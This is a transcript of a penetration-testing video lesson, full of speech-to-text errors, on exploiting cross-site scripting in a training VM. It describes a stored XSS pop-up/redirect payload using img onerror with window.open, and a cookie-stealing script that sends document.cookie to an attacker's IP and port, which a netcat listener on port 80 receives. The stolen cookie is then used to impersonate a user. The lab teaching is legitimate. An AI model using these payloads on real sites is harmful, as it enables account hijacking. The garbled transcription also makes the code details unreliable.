welcome to cyber ery. I'm Raymond Evans. I will be your subject matter expert for sy Berries. With that pen testing course in this video, we will be discussing exploiting cross site scripting what will be covered. We're gonna talk about how to exploit cross *** scripting manually,
using redirection and cookie theft and then how to exploit cross site scripting with beef. So how do we explain cross site scripting manually? The same technique that's used identify across the scripting could also be used to exploit it.
Except some additional steps seem to be taken. First. We decide what kind of attack we want to perform.
Do you want to redirect the user to a malicious site or you lost some data from home?
The next we're going to cover across that scripting redirection. First, we're gonna cover cross site scripting redirection, But first you're gonna need an additional B m Gonna need the cross a scripting VM from pen tester labs. So get a pen. Tester labs dot com
four slash exercise for slash excess underscore and underscore my sequel underscore file.
That is the VM that we will be using for this one. So how do we exploit Cross I, scripting manually to attempt redirection well, blows a line of code that could be used to call us an unwanted pop up on a vulnerable pull website. So here and this code, we see it's calling image source
example dot com on error
excess I with so that that on error window dot open
that you are all that you put in there.
He's gonna be the u R l A. It's trying to call,
and it's gonna have a height and width of 500
by 500. So let's go check that out. Okay, so here we are in our environment
we went to Ah, when I get somebody who's viewing this blawg to get re director or at least have a pop up come up, so we're gonna do is
I'm gonna come in here and, uh, we're gonna
Let's go a title test and we're gonna leave it by a non.
So here in the text field, we're gonna part of script in here and
Look at that ice weasel has prevented a safe from hoping a pop up window,
See? And this is why it's good af papa blocker just turned on. But for the purposes of this class, we're gonna allow the pop up blockers right now so you can check it out.
And we're gonna refresh the page here because the
attack is already on the Beijing stored on there. Right now, we're gonna refresh
now. If this is connected to the Internet, it would've connected to google dot com.
However, it was not so
it did not connect. Now, the reason why this worked like it did was because it's trying to pull an image source from this website, but it gets an error trying to pull it from that website.
So then, on that error, it opens up a window
and tries to go to google dot com.
we showed you before that your cookie
won't always show up in that in that other box, which shows that in the last video, and
if you are to try toe pool, the cookie and the pop up
in this environment would do the same exact thing. You're not gonna get
that document to populating the problem. However, you can't set the listener to try to get that cookie right back to you. So
break this line down a bit here that we got. So we have script, new image, that source.
the listeners I p import.
And when it calls out to it, it's gonna send the document that cookie to that port. So the script script is enclosed. The state includes Is this content as a script new image source?
It identifies a server to communicate with it, saying, Hey, we're gonna pull new image from this source and then listener I p
and port four slash beata PHP Do document that cookie. This portion identifies the server the script will communicate with, and we'll send the cookies to that communicator. So here's an example how
this is being used or new invulnerable field. We will have
script New image. Source http The i p address of the attacker
whatever the port is that the Attackers will stay in line
force I speed up PHP. How did we get data back from this attack? Well,
nor do that, we're gonna have to set up a listener, so we need a listener. So in your terminal type net Cat Tech L V P 80
l tells Nakata. Listen, V tells cat neck active verb. Oh, slee print out information received and P doesn't get support to use.
So let's go set that up real quick. Here we are in our environment.
So you're gonna take
net cats listening on Port 80.
Next, we're gonna put our script
onto the vulnerable one page.
All right, so here we are on our vulnerable section of the page.
We have a script, new image source
and we have our i p address here and Port 80
and we have our net catalyst already set up. So let's submit the query and see what happens.
Well, we are pop up because it's stored from last time, so it's close out there.
I see a pen tester lab's still working here,
so it's come over here to our listener. Oh, look at that. We got some information back
so Penn Test Labs is connected to us.
See? You get request
the host. We see the user agent so we see what they're coming from.
Except except except
were system mystics of information here.
Played a Continue working here and see if it senses that nice cookie back.
Try refreshing the page here,
And there we go. Now we refresh the page.
from the active user.
So now this cookie here can be used to imitate the individual on the Web based. So if that person was to be logged in at the time as the admin or as somebody else,
this cookie here can be used to imitate them, which is very dangerous. So
there's something that had sense of data all in it. If there's a website, that sense of data on it,
and it was vulnerable to cross that scripting, an attack like this could be used steel cookie that could imitate an individual
to get access into the website.